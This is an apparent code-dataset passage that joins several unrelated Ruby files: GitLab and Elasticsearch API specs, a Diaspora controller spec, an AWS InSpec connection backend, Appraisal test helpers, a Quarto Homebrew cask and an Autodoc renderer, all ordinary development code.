expect(json_response['message']).to eq("Milestone(s) not found: v1.0")
end
end
end
end
describe 'PUT /projects/:id/releases/:tag_name' do
let(:params) { { description: 'Best release ever!' } }
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
name: 'New release',
released_at: '2018-03-01T22:00:00Z',
description: 'Super nice release')
end
before do
initialize_tags
end
it 'accepts the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:ok)
end
it 'updates the description' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.description).to eq('Best release ever!')
end
it 'does not change other attributes' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.tag).to eq('v0.1')
expect(project.releases.last.name).to eq('New release')
expect(project.releases.last.released_at).to eq('2018-03-01T22:00:00Z')
end
it 'matches response schema' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
it 'updates released_at' do
params = { released_at: '2015-10-10T05:00:00Z' }
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.released_at).to eq('2015-10-10T05:00:00Z')
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
put api("/projects/#{project.id}/releases/v0.1", developer), params: params
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", developer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when user tries to update sha' do
let(:params) { { sha: 'xxx' } }
it 'does not allow the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'when params is empty' do
let(:params) { {} }
it 'does not allow the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'when there are no corresponding releases' do
let!(:release) { }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is a reporter' do
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", reporter), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'with milestones' do
let(:returned_milestones) { json_response['milestones'].map {|m| m['title']} }
subject { put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params }
context 'when a milestone is passed in' do
let(:milestone) { create(:milestone, project: project, title: 'v1.0') }
let(:milestone_title) { milestone.title }
let(:params) { { milestones: [milestone_title] } }
before do
release.milestones << milestone
end
context 'a different milestone' do
let(:milestone_title) { 'v2.0' }
let!(:milestone2) { create(:milestone, project: project, title: milestone_title) }
it 'replaces the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v2.0'])
end
end
context 'an identical milestone' do
let(:milestone_title) { 'v1.0' }
it 'does not change the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'an empty milestone' do
let(:milestone_title) { nil }
it 'removes the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(json_response['milestones']).to be_nil
end
end
context 'without milestones parameter' do
let(:params) { { name: 'some new name' } }
it 'does not change the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'multiple milestones' do
context 'with one new' do
let!(:milestone2) { create(:milestone, project: project, title: 'milestone2') }
let(:params) { { milestones: [milestone.title, milestone2.title] } }
it 'adds the new milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0', 'milestone2'])
end
end
context 'with all new' do
let!(:milestone2) { create(:milestone, project: project, title: 'milestone2') }
let!(:milestone3) { create(:milestone, project: project, title: 'milestone3') }
let(:params) { { milestones: [milestone2.title, milestone3.title] } }
it 'replaces the milestones' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(%w(milestone2 milestone3))
end
end
end
end
end
end
describe 'DELETE /projects/:id/releases/:tag_name' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
name: 'New release',
description: 'Super nice release')
end
it 'accepts the request' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'destroys the release' do
expect do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
end.to change { Release.count }.by(-1)
end
it 'does not remove a tag in repository' do
expect do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
end.not_to change { Project.find_by_id(project.id).repository.tag_count }
end
it 'matches response schema' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to match_response_schema('public_api/v4/release')
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
delete api("/projects/#{project.id}/releases/v0.1", developer)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", developer)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when there are no corresponding releases' do
let!(:release) { }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is a reporter' do
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", reporter)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
end
describe 'Track API events', :snowplow do
context 'when tracking event with labels from User-Agent' do
it 'adds the tracked User-Agent to the label of the tracked event' do
get api("/projects/#{project.id}/releases", maintainer), headers: { 'User-Agent' => described_class::RELEASE_CLI_USER_AGENT }
assert_snowplow_event('get_releases', true)
end
it 'skips label when User-Agent is invalid' do
get api("/projects/#{project.id}/releases", maintainer), headers: { 'User-Agent' => 'invalid_user_agent' }
assert_snowplow_event('get_releases', false)
end
end
end
def initialize_tags
project.repository.add_tag(maintainer, 'v0.1', commit.id)
project.repository.add_tag(maintainer, 'v0.2', commit.id)
end
def assert_snowplow_event(action, release_cli, user = maintainer)
expect_snowplow_event(
category: described_class.name,
action: action,
project: project,
user: user,
release_cli: release_cli
)
end
end
| 34.292481 | 152 | 0.613651 |
e20e83bafdd6e116dc7120db514e57fe5a347385 | 1,481 | # Copyright (c) 2010-2011, Diaspora Inc. This file is
# licensed under the Affero General Public License version 3 or later. See
# the COPYRIGHT file.
require 'spec_helper'
describe Devise::PasswordsController do
include Devise::TestHelpers
before do
@request.env["devise.mapping"] = Devise.mappings[:user]
end
describe "#create" do
context "when there is no such user" do
it "succeeds" do
post :create, "user" => {"email" => "[email protected]"}
response.should be_success
end
it "doesn't send email" do
expect {
post :create, "user" => {"email" => "[email protected]"}
}.to change(Devise.mailer.deliveries, :length).by(0)
end
end
context "when there is a user with that email" do
it "redirects to the login page" do
post :create, "user" => {"email" => alice.email}
response.should redirect_to(new_user_session_path)
end
it "sends email" do
expect {
post :create, "user" => {"email" => alice.email}
}.to change(Devise.mailer.deliveries, :length).by(1)
end
it "sends email with a non-blank body" do
post :create, "user" => {"email" => alice.email}
email = Devise.mailer.deliveries.last
email_body = email.body.to_s
email_body = email.html_part.body.raw_source if email_body.blank? && email.html_part.present?
email_body.should_not be_blank
end
end
end
end | 32.911111 | 101 | 0.625928 |
e96d4c631b65c0d66f2d0901bb5e903c0a1f2bc3 | 358 | require_relative 'cuda_model'
require_relative 'gen_probe_base.rb'

# LTTng-UST provider name used for all generated CUDA tracepoints.
provider = :lttng_ust_cuda

# Emit the C prelude of the generated probe file.
# NOTE: the heredoc body is the script's output -- it must stay exactly as-is.
puts <<EOF
#define __CUDA_API_VERSION_INTERNAL 1
#include <cuda.h>
EOF

# $cuda_commands, $tracepoint_lambda and LTTNG_USABLE_PARAMS are presumably
# defined by the required files (cuda_model / gen_probe_base) -- TODO confirm.
# Emit a :start and :stop tracepoint for each CUDA command, skipping commands
# with more parameters than LTTng can usefully handle.
$cuda_commands.each { |c|
  next if c.parameters && c.parameters.length > LTTNG_USABLE_PARAMS
  $tracepoint_lambda.call(provider, c, :start)
  $tracepoint_lambda.call(provider, c, :stop)
}
| 21.058824 | 67 | 0.77095 |
e92cfb66fe02b7155ffec8ff6d02b7713ba5131c | 11,709 | # frozen_string_literal: true
require 'aws-sdk-autoscaling'
require 'aws-sdk-cloudtrail'
require 'aws-sdk-cloudwatch'
require 'aws-sdk-cloudwatchlogs'
require 'aws-sdk-configservice'
require 'aws-sdk-core'
require 'aws-sdk-ec2'
require 'aws-sdk-ecs'
require 'aws-sdk-eks'
require 'aws-sdk-elasticloadbalancing'
require 'aws-sdk-iam'
require 'aws-sdk-kms'
require 'aws-sdk-organizations'
require 'aws-sdk-rds'
require 'aws-sdk-s3'
require 'aws-sdk-sns'
require 'aws-sdk-sqs'
require 'rspec/expectations'
# AWS Inspec Backend Classes
#
# Class to manage the AWS connection, instantiates all required clients for inspec resources
#
# Manages the AWS connection for InSpec resources: lazily instantiates and
# caches one SDK client per client class, optionally passing through
# caller-supplied client arguments (region, endpoint, stub settings, ...).
class AwsConnection
  # @param params [Hash, nil] may contain :client_args, a Hash forwarded
  #   verbatim to every SDK client constructor (useful for stubbing and
  #   non-standard endpoints -- see links below).
  def initialize(params)
    params = {} if params.nil?
    # Special case for AWS, let's allow all resources to specify parameters that propagate to the client init
    # This can be useful for e.g.
    # https://docs.aws.amazon.com/sdk-for-ruby/v3/developer-guide/stubbing.html
    # https://docs.aws.amazon.com/sdk-for-ruby/v3/developer-guide/setup-config.html#aws-ruby-sdk-setting-non-standard-endpoint
    if params.is_a?(Hash)
      @client_args = params.fetch(:client_args, nil)
    end
    # Per-connection client cache, keyed by the client class name (Symbol).
    @cache = {}
  end

  # Returns a cached instance of the given SDK client class, creating it on
  # first use (with @client_args when those were supplied).
  def aws_client(klass)
    # TODO: make this a dict with keys of klass.to_s.to_sym such that we can send different args per client in cases such as EC2 instance that use multiple different clients
    return @cache[klass.to_s.to_sym] ||= klass.new(@client_args) if @client_args

    @cache[klass.to_s.to_sym] ||= klass.new
  end

  # Instantiates an SDK resource class (not cached, unlike aws_client).
  def aws_resource(klass, args)
    return klass.new(args, @client_args) if @client_args

    klass.new(args)
  end

  # Returns an identifier unique to this connection's credentials.
  def unique_identifier
    # use aws account id
    client = aws_client(::Aws::STS::Client)
    client.get_caller_identity.account
  end

  # SDK Client convenience methods

  def cloudtrail_client
    aws_client(Aws::CloudTrail::Client)
  end

  def cloudwatch_client
    aws_client(Aws::CloudWatch::Client)
  end

  def cloudwatchlogs_client
    aws_client(Aws::CloudWatchLogs::Client)
  end

  def compute_client
    aws_client(Aws::EC2::Client)
  end

  def config_client
    aws_client(Aws::ConfigService::Client)
  end

  def ecs_client
    aws_client(Aws::ECS::Client)
  end

  def eks_client
    aws_client(Aws::EKS::Client)
  end

  def elb_client
    aws_client(Aws::ElasticLoadBalancing::Client)
  end

  def iam_client
    aws_client(Aws::IAM::Client)
  end

  def kms_client
    aws_client(Aws::KMS::Client)
  end

  def org_client
    aws_client(Aws::Organizations::Client)
  end

  def rds_client
    aws_client(Aws::RDS::Client)
  end

  def service_client
    aws_client(Aws::AutoScaling::Client)
  end

  def sqs_client
    aws_client(Aws::SQS::Client)
  end

  def sns_client
    aws_client(Aws::SNS::Client)
  end

  def storage_client
    aws_client(Aws::S3::Client)
  end

  def sts_client
    aws_client(Aws::STS::Client)
  end
end
# Base class for AWS resources
#
class AwsResourceBase < Inspec.resource(1)
attr_reader :opts, :aws
def initialize(opts)
@opts = opts
# ensure we have a AWS connection, resources can choose which of the clients to instantiate
client_args = { client_args: {} }
if opts.is_a?(Hash)
# below allows each resource to optionally and conveniently set a region
client_args[:client_args][:region] = opts[:aws_region] if opts[:aws_region]
# below allows each resource to optionally and conveniently set an endpoint
client_args[:client_args][:endpoint] = opts[:aws_endpoint] if opts[:aws_endpoint]
# this catches the stub_data true option for unit testing - and others that could be useful for consumers
client_args[:client_args].update(opts[:client_args]) if opts[:client_args]
end
@aws = AwsConnection.new(client_args)
# N.B. if/when we migrate AwsConnection to train, can update above and inject args via:
# inspec.backend.aws_client(Aws::EC2::Resource,opts)
# inspec.backend.aws_resource(Aws::EC2::Resource,opts)
# However, for the unit testing case, would potentially have to instantiate the client ourselves...
# here we might want to inject stub data for testing, let's use an option for that
return if !defined?(@opts.keys) || [email protected]?(:stub_data)
raise ArgumentError, 'Expected stub data to be an array' if !opts[:stub_data].is_a?(Array)
opts[:stub_data].each do |stub|
raise ArgumentError, 'Expect each stub_data hash to have :client, :method and :data keys' if !stub.keys.all? { |a| %i(method data client).include?(a) }
@aws.aws_client(stub[:client]).stub_responses(stub[:method], stub[:data])
end
end
def validate_parameters(allowed_list)
allowed_list += %i(client_args stub_data aws_region aws_endpoint)
raise ArgumentError, 'Scalar arguments not supported' if !defined?(@opts.keys)
raise ArgumentError, 'Unexpected arguments found' if [email protected]? { |a| allowed_list.include?(a) }
raise ArgumentError, 'Provided parameter should not be empty' if [email protected]? { |a| !a.empty? }
true
end
def failed_resource?
@failed_resource
end
# Intercept AWS exceptions
def catch_aws_errors
yield # Catch and create custom messages as needed
rescue Aws::Errors::MissingCredentialsError
Inspec::Log.error 'It appears that you have not set your AWS credentials. See https://www.inspec.io/docs/reference/platforms for details.'
fail_resource('No AWS credentials available')
rescue Aws::Errors::ServiceError => e
if is_permissions_error(e)
advice = ''
error_type = e.class.to_s.split('::').last
if error_type == 'InvalidAccessKeyId'
advice = 'Please ensure your AWS Access Key ID is set correctly.'
elsif error_type == 'AccessDenied'
advice = 'Please check the IAM permissions required for this Resource in the documentation, ' \
'and ensure your Service Principal has these permissions set.'
end
fail_resource("Unable to execute control: #{e.message}\n#{advice}")
else
Inspec::Log.warn "AWS Service Error encountered running a control with Resource #{@__resource_name__}. " \
"Error message: #{e.message}. You should address this error to ensure your controls are " \
'behaving as expected.'
@failed_resource = true
nil
end
end
def create_resource_methods(object)
dm = AwsResourceDynamicMethods.new
dm.create_methods(self, object)
end
# Each client has its own variation of Aws::*::Errors::AccessDenied, making the checking cumbersome and flaky.
# Checking the status code is more reliable.
def is_permissions_error(error)
true if error.context.http_response.status_code == 403
end
def map_tags(tag_list)
return {} if tag_list.nil? || tag_list.empty?
tags = {}
tag_list.each do |tag|
tags[tag[:key]] = tag[:value]
end
tags
end
end
# Class to create methods on the calling object at run time. Heavily based on the Azure Inspec resources.
#
class AwsResourceDynamicMethods
  # Given the calling object and its data, create the methods on the object according
  # to the data that has been retrieved. Various types of data can be returned so the method
  # checks the type to ensure that the necessary methods are configured correctly
  #
  # @param object The object on which the methods should be created
  # @param data The data from which the methods should be created
  def create_methods(object, data)
    # Check the type of data as this affects the setup of the methods
    # If it is an Aws Generic Resource then setup methods for each of
    # the instance variables
    case data.class.to_s
    when /Aws::.*/
      # iterate around the instance variables
      data.instance_variables.each do |var|
        create_method(object, var.to_s.delete('@'), data.instance_variable_get(var))
      end
    # When the data is a Hash object iterate around each of the key value pairs and
    # create a method for each one.
    when 'Hash'
      data.each do |key, value|
        create_method(object, key, value)
      end
    end
  end

  private

  # Method that is responsible for creating the method on the calling object. This is
  # because some nesting may be required. For example, if the value is a Hash then it will
  # need to have an AwsResourceProbe created for each key, whereas if it is a simple
  # string then the value just needs to be returned
  #
  # @param object The object on which the method should be defined
  # @param name [String, Symbol] name of the method being defined
  # @param value The raw value the method should expose
  def create_method(object, name, value)
    # Create the necessary method based on the var that has been passed
    # Test the value for its type so that the method can be setup correctly
    case value.class.to_s
    when 'String', 'Integer', 'TrueClass', 'FalseClass', 'Fixnum'
      object.define_singleton_method name do
        value
      end
    when 'Hash'
      # An empty Hash is exposed as-is; a populated one is wrapped in a probe
      # so its nested keys become methods too.
      value.count.zero? ? return_value = value : return_value = AwsResourceProbe.new(value)
      object.define_singleton_method name do
        return_value
      end
    # there are nested AWS API classes throughout
    when /Aws::.*/
      object.define_singleton_method name do
        # NOTE: `value` is captured by this closure; the first invocation
        # converts it to a Hash in place (when possible) before wrapping it.
        value = value.to_h if value.respond_to? :to_h
        AwsResourceProbe.new(value)
      end
    when 'Array'
      # Some things are just string or integer arrays
      # Check this by seeing if the first element is a string / integer / boolean or
      # a hashtable
      # This may not be the best method, but short of testing all elements in the array, this is
      # the quickest test
      case value[0].class.to_s
      when 'String', 'Integer', 'TrueClass', 'FalseClass', 'Fixnum'
        probes = value
      else
        if name.eql?(:tags)
          # Tag lists collapse to a plain Hash of tag key => tag value.
          probes = {}
          value.each do |tag|
            probes[tag[:key]] = tag[:value]
          end
        else
          # Everything else becomes an array of nested probes.
          probes = []
          value.each do |value_item|
            value_item = value_item.to_h if value_item.respond_to? :to_h
            probes << AwsResourceProbe.new(value_item)
          end
        end
      end
      object.define_singleton_method name do
        probes
      end
    end
  end
end
# Class object created for each element returned by the AWS API. This is what
# is interrogated by InSpec. Nested hashes result in nested AwsResourceProbe
# objects.
#
# The methods for each instance are dynamically defined at run time and
# mirror the fields of the item retrieved from AWS.
#
class AwsResourceProbe
  attr_reader :name, :type, :location, :item, :count

  # Wraps +item+ (scalar value, Hash or AWS SDK object) and defines reader
  # methods for each of its fields via AwsResourceDynamicMethods.
  #
  # @param item The item from which the class will be initialized
  # @return AwsResourceProbe
  def initialize(item)
    AwsResourceDynamicMethods.new.create_methods(self, item)
    # Keep the raw item around so callers can distinguish the dynamically
    # added readers from standard Ruby methods (used e.g. when checking tags
    # on a resource), and to allow direct access when required.
    @item = item
    # Record how many entries the item holds, when it has a length.
    @count = item.length if item.respond_to? :length
  end

  # Allows resources to respond to the `include` matcher, so things like
  # tags can be checked for and then their value tested.
  #
  # @param [String] key Name of the item to look for in the @item property
  def include?(key)
    @item.key?(key)
  end
end
| 34.037791 | 173 | 0.702024 |
e9779b68e1c9385cd7ed643ecd52a2884a2f1e9b | 1,975 | require 'test_helper'
module Elasticsearch
  module Test
    # Unit tests for the `indices.segments` client API. Each example stubs
    # the transport layer (Mocha `expects(:perform_request)`) and asserts on
    # the HTTP verb, path and parameters the client would send; no real
    # cluster is contacted.
    class IndicesSegmentsTest < ::Test::Unit::TestCase

      context "Indices: Segments" do
        subject { FakeClient.new }

        should "perform correct request" do
          subject.expects(:perform_request).with do |method, url, params, body|
            assert_equal 'GET', method
            assert_equal '_segments', url
            assert_equal Hash.new, params
            assert_nil body
            true
          end.returns(FakeResponse.new)

          subject.indices.segments
        end

        should "perform request against an index" do
          subject.expects(:perform_request).with do |method, url, params, body|
            assert_equal 'foo/_segments', url
            true
          end.returns(FakeResponse.new)

          subject.indices.segments :index => 'foo'
        end

        should "perform request against multiple indices" do
          # The stub is exercised twice: once for the Array form and once
          # for the comma-separated String form of :index.
          subject.expects(:perform_request).with do |method, url, params, body|
            assert_equal 'foo,bar/_segments', url
            true
          end.returns(FakeResponse.new).twice

          subject.indices.segments :index => ['foo','bar']
          subject.indices.segments :index => 'foo,bar'
        end

        should "pass the URL parameters" do
          subject.expects(:perform_request).with do |method, url, params, body|
            assert_equal 'foo,bar/_segments', url
            assert_equal 'missing', params[:ignore_indices]
            true
          end.returns(FakeResponse.new)

          subject.indices.segments :index => ['foo','bar'], :ignore_indices => 'missing'
        end

        should "URL-escape the parts" do
          # `foo^bar` must arrive percent-encoded in the request path.
          subject.expects(:perform_request).with do |method, url, params, body|
            assert_equal 'foo%5Ebar/_segments', url
            true
          end.returns(FakeResponse.new)

          subject.indices.segments :index => 'foo^bar'
        end

      end

    end
  end
end
| 30.384615 | 88 | 0.601013 |
0889033412081d5a0acfad4346e4c47c03832dfb | 3,883 | require 'rspec/expectations/expectation_target'
require 'active_support/core_ext/string/strip'
require 'active_support/core_ext/string/filters'
require 'active_support/concern'
require 'appraisal/utils'
require "./spec/support/dependency_helpers"
# Shared helpers for Appraisal's acceptance specs: builds an isolated project
# under tmp/stage, sandboxes Bundler's environment variables, and shells out
# to real `bundle` commands.
module AcceptanceTestHelpers
  extend ActiveSupport::Concern
  include DependencyHelpers

  # Bundler-related variables that must be cleared so the spec's subprocesses
  # do not inherit the host project's bundle.
  BUNDLER_ENVIRONMENT_VARIABLES = %w(RUBYOPT BUNDLE_PATH BUNDLE_BIN_PATH
    BUNDLE_GEMFILE)

  included do
    metadata[:type] = :acceptance

    before :parallel => true do
      unless Appraisal::Utils.support_parallel_installation?
        pending 'This Bundler version does not support --jobs flag.'
      end
    end

    # Rebuild the sandbox from scratch before each example; the environment
    # is restored afterwards, so ordering here matters (save before unset).
    before do
      cleanup_artifacts
      save_environment_variables
      unset_bundler_environment_variables
      build_default_dummy_gems
      ensure_bundler_is_available
      add_binstub_path
      build_default_gemfile
    end

    after do
      restore_environment_variables
    end
  end

  # Snapshots PATH plus the Bundler variables so restore_environment_variables
  # can undo any mutation after each example.
  def save_environment_variables
    @original_environment_variables = {}

    (BUNDLER_ENVIRONMENT_VARIABLES + %w(PATH)).each do |key|
      @original_environment_variables[key] = ENV[key]
    end
  end

  def unset_bundler_environment_variables
    BUNDLER_ENVIRONMENT_VARIABLES.each do |key|
      ENV[key] = nil
    end
  end

  # Prepends the generated binstubs so `run` picks up sandboxed executables.
  def add_binstub_path
    ENV['PATH'] = "bin:#{ENV['PATH']}"
  end

  def restore_environment_variables
    @original_environment_variables.each_pair do |key, value|
      ENV[key] = value
    end
  end

  def build_appraisal_file(content)
    write_file 'Appraisals', content.strip_heredoc
  end

  def build_gemfile(content)
    write_file 'Gemfile', content.strip_heredoc
  end

  def add_gemspec_to_gemfile
    in_test_directory do
      File.open('Gemfile', 'a') { |file| file.puts 'gemspec' }
    end
  end

  def build_gemspec
    write_file "stage.gemspec", <<-gemspec
      Gem::Specification.new do |s|
        s.name = 'stage'
        s.version = '0.1'
        s.summary = 'Awesome Gem!'
        s.authors = "Appraisal"
      end
    gemspec
  end

  # Reads a generated file, rewriting modern hash syntax (`key: value`) into
  # hash-rocket form so expectations are uniform across Ruby versions.
  def content_of(path)
    file(path).read.tap do |content|
      content.gsub!(/(\S+): /, ":\\1 => ")
    end
  end

  def file(path)
    Pathname.new(current_directory) + path
  end

  # Spec-friendly alias so examples can read `expect(...).to be_exists`.
  def be_exists
    be_exist
  end

  private

  def current_directory
    File.expand_path('tmp/stage')
  end

  def write_file(filename, content)
    in_test_directory { File.open(filename, 'w') { |file| file.puts content } }
  end

  def cleanup_artifacts
    FileUtils.rm_rf current_directory
  end

  def build_default_dummy_gems
    FileUtils.mkdir_p(TMP_GEM_ROOT)

    build_gem 'dummy', '1.0.0'
    build_gem 'dummy', '1.1.0'
  end

  # Installs Bundler into TMP_GEM_ROOT when it is not runnable in the sandbox
  # (e.g. when BUNDLE_DISABLE_SHARED_GEMS hides the host install).
  def ensure_bundler_is_available
    run "bundle -v 2>&1", false

    if $?.exitstatus != 0
      puts <<-WARNING.squish.strip_heredoc
        Reinstall Bundler to #{TMP_GEM_ROOT} as `BUNDLE_DISABLE_SHARED_GEMS`
        is enabled.
      WARNING
      # NOTE(review): `Utils` is unqualified here — presumably Appraisal::Utils;
      # confirm this constant resolves in the spec environment.
      version = Utils.bundler_version
      run "gem install bundler --version #{version} --install-dir '#{TMP_GEM_ROOT}'"
    end
  end

  def build_default_gemfile
    build_gemfile <<-Gemfile
      source 'https://rubygems.org'

      gem 'appraisal', :path => '#{PROJECT_ROOT}'
    Gemfile

    run "bundle install --binstubs --local"
  end

  def in_test_directory(&block)
    FileUtils.mkdir_p current_directory
    Dir.chdir current_directory, &block
  end

  # Runs a shell command inside the sandbox, echoing output when VERBOSE is
  # set and raising (by default) on a non-zero exit status.
  def run(command, raise_on_error = true)
    in_test_directory do
      `#{command}`.tap do |output|
        exitstatus = $?.exitstatus

        if ENV["VERBOSE"]
          puts output
        end

        if raise_on_error && exitstatus != 0
          raise RuntimeError, <<-error_message.strip_heredoc
            Command #{command.inspect} exited with status #{exitstatus}. Output:
            #{output.gsub(/^/, '  ')}
          error_message
        end
      end
    end
  end
end
| 22.707602 | 84 | 0.677311 |
3849e341fefe9d6961cabcd20a7ec39f43e48660 | 557 | cask "quarto" do
version "0.9.449"
sha256 "080dbaafbb1426b28354ed6e50f735d87e4ec45c4c8dbdd029281f9d7b319bf5"
url "https://github.com/quarto-dev/quarto-cli/releases/download/v#{version}/quarto-#{version}-macos.pkg",
verified: "github.com/quarto-dev/quarto-cli/"
name "quarto"
desc "Scientific and technical publishing system built on Pandoc"
homepage "https://www.quarto.org/"
depends_on macos: ">= :el_capitan"
pkg "quarto-#{version}-macos.pkg"
uninstall pkgutil: "org.rstudio.quarto"
zap trash: "~/Library/Caches/quarto"
end
| 29.315789 | 107 | 0.736086 |
3893e89f59c365a03d10073945ae1db8eac69352 | 6,723 | require "action_dispatch/http/request"
require "active_support/core_ext/hash/slice"
require "active_support/core_ext/string/strip"
require "uri"
require "erb"
require "pathname"
module Autodoc
  # Renders a single API-documentation page (Markdown) from one RSpec
  # request-spec example: it inspects the example's recorded HTTP request and
  # response (either rack-test or rails integration style) and feeds them into
  # the configured ERB template.
  class Document
    # Fallback mapping from a spec file path to the generated document path,
    # e.g. ./spec/requests/users_spec.rb -> requests/users.md
    DEFAULT_DOCUMENT_PATH_FROM_EXAMPLE = ->(example) do
      example.file_path.gsub(%r<\./spec/[^/]+/(.+)_spec\.rb>, '\1.md')
    end

    # Convenience wrapper: build a Document and render it in one call.
    def self.render(*args)
      new(*args).render
    end

    # @param context the RSpec example group instance (exposes request/response)
    # @param example the RSpec example metadata object
    def initialize(context, example)
      @context = context
      @example = example
    end

    # Absolute output path for this document (memoized).
    def pathname
      @pathname ||= begin
        Autodoc.configuration.pathname + document_path_from_example.call(example)
      end
    end

    # Renders the configured ERB template against this document's binding.
    # NOTE(review): the positional (safe_level, trim_mode) ERB.new arguments
    # are deprecated since Ruby 2.6 — confirm target Ruby before switching to
    # `trim_mode: "-"`.
    def render
      ERB.new(Autodoc.configuration.template, nil, "-").result(binding)
    end

    # e.g. "GET /users/:id"
    def title
      "#{method} #{path}"
    end

    # Anchor-friendly form of the title, e.g. "get-usersid".
    def identifier
      title.gsub(" ", "-").gsub(/[:\/]/, "").downcase
    end

    private

    def document_path_from_example
      Autodoc.configuration.document_path_from_example || DEFAULT_DOCUMENT_PATH_FROM_EXAMPLE
    end

    # RSpec >= 2.99/3 passes the example explicitly; older versions expose it
    # on the example-group context.
    def example
      if ::RSpec::Core::Version::STRING.match(/\A(?:3\.|2.99\.)/)
        @example
      else
        @context.example
      end
    end

    # The recorded request, normalized to an ActionDispatch::Request for
    # rack-test sessions (memoized).
    def request
      @request ||= begin
        if using_rack_test?
          ActionDispatch::Request.new(@context.last_request.env)
        else
          @context.request
        end
      end
    end

    # The recorded response object (memoized).
    def response
      @response ||= begin
        if using_rack_test?
          @context.last_response
        else
          @context.response
        end
      end
    end

    def method
      request.request_method
    end

    # Renders the request headers as "Name: value" lines, sorted, with blank
    # and suppressed headers removed and HTTP_FOO_BAR keys mapped to Foo-Bar.
    def request_header
      table = request_header_from_fixed_keys
      table.merge!(request_header_from_http_prefix)
      table.reject! {|key, value| value.blank? }
      table = Hash[table.map {|key, value| [key.split(?_).map(&:downcase).map(&:camelize).join(?-), value] }]
      table.except!(*Autodoc.configuration.suppressed_request_header)
      table.map {|key, value| [key, value].join(": ") }.sort.join("\n")
    end

    def request_header_from_http_prefix
      request.headers.inject({}) do |table, (key, value)|
        if key.start_with?("HTTP_")
          table.merge(key.gsub(/^HTTP_/, "") => value)
        else
          table
        end
      end
    end

    # Headers that Rack stores without the HTTP_ prefix.
    def request_header_from_fixed_keys
      table = request.headers
      table = table.env if table.respond_to?(:env)
      table.slice("CONTENT_TYPE", "CONTENT_LENGTH", "LOCATION")
    end

    def request_http_version
      request.env["HTTP_VERSION"] || "HTTP/1.1"
    end

    # "?a=b" style query string, or nil when there is none.
    # NOTE(review): URI.unescape is deprecated and removed in Ruby 3.0 —
    # confirm the supported Ruby range before upgrading.
    def request_query
      "?#{URI.unescape(request.query_string.force_encoding(Encoding::UTF_8))}" unless request.query_string.empty?
    end

    def request_body_section
      "\n\n#{request_body}" if request_body.present?
    end

    # Pretty-printed request body (memoized; may legitimately memoize nil).
    def request_body
      if instance_variable_defined?(:@request_body)
        @request_body
      else
        @request_body = begin
          case
          when request.try(:content_type) == "multipart/form-data"
            "multipart/form-data"
          when request.headers["Content-Type"].try(:include?, "application/json")
            request_body_parsed_as_json
          else
            request.body.string
          end
        end
      end
    end

    # Returns nil (rather than raising) for unparsable JSON.
    def request_body_parsed_as_json
      JSON.pretty_generate(JSON.parse(request.body.string))
    rescue JSON::ParserError
    end

    # Response headers rendered as sorted "Name: value" lines, with
    # suppressed headers removed.
    def response_header
      table = response.headers.clone
